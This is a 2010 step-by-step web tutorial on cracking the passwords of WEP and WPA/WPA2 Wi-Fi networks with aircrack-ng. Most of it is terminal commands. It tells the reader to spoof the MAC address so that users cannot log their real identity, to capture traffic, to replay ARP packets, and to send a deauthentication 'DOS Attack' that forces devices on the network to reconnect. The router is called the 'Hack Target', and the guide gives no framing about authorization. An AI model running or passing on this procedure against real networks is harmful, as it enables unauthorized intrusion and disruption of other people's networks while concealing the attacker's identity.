Hacking Encrypted Wireless Network - Fredrik-Alm.se

Hacking Encrypted Wireless Network

Written by Fredrik Alm CompuTechSweden | 2010 http://www.fredrik-alm.se/

REQUIREMENTS Software: Operating System:

Linux kernel

(Recommended: BackTrack 4 Final ) Download: Live CD (1570 MB)

3rd Party Software:

aircrack-ng macchanger

(Pre-Included in BackTrack) (Pre-Included in BackTrack)

Hardware: Computer:

A working standard Desktop/Laptop PC. (No Hard Drive Needed)

Devices:

A Linux compatible Wi-Fi device installed on your PC.

Word Explanation

AP

= Access Point (Wi-Fi-Station)

##

= A optional number DEVICE = Computers Wi-Fi Device Card BSSID = The AP:s MAC Address CHANNEL = The AP:s Active Wi-Fi Channel WORDLIST = Path to a dictionary wordlist FAKEMAC = A optional faked MAC Address CAPTUREFILE = The file were captured data is stored

(ex. Router / Hack Target

)

(ex: (ex: (ex: (ex: (ex: (ex: (ex:

) ) )

30 wlan0 F4:32:B6:4C:DE:4A 6 home/passwords.txt 00:11:22:33:44:66 wepcapture-01.cap

) ) )

Useful Keyboardshortcuts in Terminal Ctrl + C Key

= In Terminal: Quitting an active process = Toggle between last used command.

(ex: Datacapturing

)

Preparing: Wi-Fi Device Background Information: Before attacking a wireless network, fake your MAC address on your Wi-Fi device to prevent users from logging your real ID. Tip: When experienced, use a complex faked MAC address so you don’t reveal yourself. (Ex. 00:11:22:33:44:66 = Obvious for others but easy for you to remember.) (Ex. F4:32:B6:4C:DE:4A = Difficult to detect but hard for you to remember.) NOTE: (All commands must be run in ROOT. If using a Live CD then you are logged in as ROOT in default. If not, then type sudo -s in every terminal before executing commands.)

- Terminal 1 # iwconfig Lists your compatible Wi-Fi Devices. Use this command to see the name of your device. Device name examples: wlan0, wifi0, eth0

# airmon-ng stop DEVICE Disables the monitor mode on your Wi-Fi device.

# macchanger --mac FAKEMAC DEVICE Changes your MAC address to a optional fake MAC on your Wi-Fi device.

# airmon-ng start DEVICE Enables the monitor mode on your Wi-Fi device.

Hacking: WEP Encryption Background Information: Wired Equivalent Privacy (WEP) is an easily broken and therefore deprecated algorithm to secure wireless networks. This type of encryption can be directly Brute-Forced, without the need of a dictionary. When hacking, the attacker must capture a large amount of data, which later will be decrypted by brute-force to reveal the network password. Tip: 

When capturing more data, the chance of a successful decryption increases. To be on the safe side, capture 200 000+ packets and 500+ ARP: s.

NOTE: (All commands must be run in ROOT. If using a Live CD then you are logged in as ROOT in default. If not, then type sudo -s in every terminal before executing the first command.)

- Terminal 1 # airodump-ng DEVICE Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc.

- Terminal 2 # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE Captures and saves encypted data/packets from the network on your computer.

- Terminal 3 # aireplay-ng -3 -b BSSID –h FAKEMAC DEVICE Capturing APR:s from the AP and increases the speed of the speeds the capture.

- Terminal 1, 2 or 3 # ls Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wepcapture-01.cap)

# aircrack-ng --bssid BSSID CAPTUREFILE Decrypts by Brute-force the captured data to finally reveal the network password.

Hacking: WPA/2 Encryption Background Information: Wi-Fi Protected Access (WPA) is an more secure and therefore hardbroken algorithm to secure wireless networks. This type of encryption can’t be directly Brute-Forced. After collection the so called WPA-Handshake, only a dictionary attack (wordlist with passwords) containing the correct password can break the encryption to reveal the network password. Tip:  

When capturing more data for a WPA-Handshake, it all depends on authorized computers to the network. It’s when a computer connects to the network, that the WPA-Handshake can be captured. This can be helped with the De-Auth process in the following commands. Before hacking, download a big and good wordlist from the internet to use with the decryption.

NOTE: (All commands must be run in ROOT. If using a Live CD then you are logged in as ROOT in default. If not, then type sudo -s in every terminal before executing the first command.)

- Terminal 1 # airodump-ng DEVICE Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc.

- Terminal 2 # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE Captures and saves encypted data/packets from the network on your computer.

- Terminal 3 # aireplay-ng -0 ## -a BSSID DEVICE Sends out a De-Auth Broadcast (DOS Attack) to force all computers on the wireless network to perform a reconnect. If successful, this might help capture the WPA-Handshake.

- Terminal 1, 2 or 3 # ls Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wpacapture-01.cap)

# aircrack-ng CAPTUREFILE WORDLIST Decrypts by Dictionary the captured data to finally reveal the network password.